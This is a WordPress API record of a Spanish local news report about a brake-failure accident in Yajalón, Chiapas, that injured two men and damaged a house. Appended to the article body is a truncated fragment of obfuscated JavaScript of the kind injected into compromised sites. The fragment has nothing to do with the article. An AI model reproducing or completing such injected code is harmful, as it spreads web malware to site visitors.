{"id":3874,"date":"2022-07-25T02:39:17","date_gmt":"2022-07-25T02:39:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3874"},"modified":"2022-07-25T02:39:18","modified_gmt":"2022-07-25T02:39:18","slug":"dos-lesionados-deja-accidente-en-yajalon","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3874","title":{"rendered":"Dos lesionados deja accidente en Yajal\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080-576x1024.jpg\" alt=\"\" class=\"wp-image-3875\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080-768x1365.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220724-WA0080.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez <\/p>\n\n\n\n<p>24 de julio del 2022. <div>Yajal\u00f3n, Chiapas.- Dos lesionados y da\u00f1os materiales fue el saldo de un accidente que se suscit\u00f3 este fin de semana en el barrio mirador a la altura de las gradas, cuando el conductor de un veh\u00edculo, intentaba subir una bocina amplificador pesado, y la unidad perdi\u00f3 fuerzas. Los hechos se dieron alrededor de las 10:20 horas del pasado s\u00e1bado, cuando el se\u00f1or Albino Mendoza Encino de 44 a\u00f1os, originario de Nuevo Para\u00edso, intentaban subir equipo de sonido, sin embargo perdi\u00f3 el control, qued\u00e1ndose sin frenos y de reversas, da\u00f1ando una casa, as\u00ed como un aparato amplificador pro 40 que se encontraba afuera de un domicilio propiedad de don Guillermo Lamg Mart\u00ednez. Los lesionados son Albino Mendoza Encinos y Rogelio M\u00e9ndez P\u00e9rez quienes fueron atendidos por param\u00e9dicos de Protecci\u00f3n Civil. El veh\u00edculo Nissan estaquita, fue llevado a la comandancia para que se determine la situaci\u00f3n jur\u00eddica del conductor y se reparen da\u00f1os.<\/div><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 24 de julio del 2022. Yajal\u00f3n, Chiapas.- Dos lesionados y da\u00f1os materiales fue el saldo de un accidente que se suscit\u00f3 este fin de semana en el barrio mirador a la altura de las gradas, cuando el conductor de un veh\u00edculo, intentaba subir una bocina amplificador pesado, y la unidad perdi\u00f3 fuerzas. Los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3875,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3874","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3874","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3874"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3874\/revisions"}],"predecessor-version":[{"id":3876,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3874\/revisions\/3876"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3875"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3874"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3874"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3874"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}